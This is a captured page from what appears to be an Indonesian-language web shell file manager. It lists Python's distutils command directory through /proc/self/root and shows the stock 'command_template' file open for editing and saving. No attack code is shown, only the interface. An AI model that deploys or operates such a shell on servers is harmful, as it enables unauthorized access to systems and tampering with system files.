PATH: //proc/self/root/usr/lib64/python3.9/distutils/command
FILE_BARU
CREATE
FOLDER_BARU
MKDIR
UPLOAD_FILE
GO
[ .. KEMBALI ]
📄 __init__.py
↓
X
📁 __pycache__/
X
📄 bdist.py
↓
X
📄 bdist_dumb.py
↓
X
📄 bdist_msi.py
↓
X
📄 bdist_rpm.py
↓
X
📄 bdist_wininst.py
↓
X
📄 build.py
↓
X
📄 build_clib.py
↓
X
📄 build_ext.py
↓
X
📄 build_py.py
↓
X
📄 build_scripts.py
↓
X
📄 check.py
↓
X
📄 clean.py
↓
X
📄 command_template
↓
X
📄 config.py
↓
X
📄 install.py
↓
X
📄 install_data.py
↓
X
📄 install_egg_info.py
↓
X
📄 install_headers.py
↓
X
📄 install_lib.py
↓
X
📄 install_scripts.py
↓
X
📄 register.py
↓
X
📄 sdist.py
↓
X
📄 upload.py
↓
X
SAVING...
BERHASIL DIUBAH!
EDITING: command_template
"""distutils.command.x Implements the Distutils 'x' command. """ # created 2000/mm/dd, John Doe __revision__ = "$Id$" from distutils.core import Command class x(Command): # Brief (40-50 characters) description of the command description = "" # List of option tuples: long name, short name (None if no short # name), and help string. user_options = [('', '', ""), ] def initialize_options(self): self. = None self. = None self. = None def finalize_options(self): if self.x is None: self.x = def run(self):
SIMPAN PERUBAHAN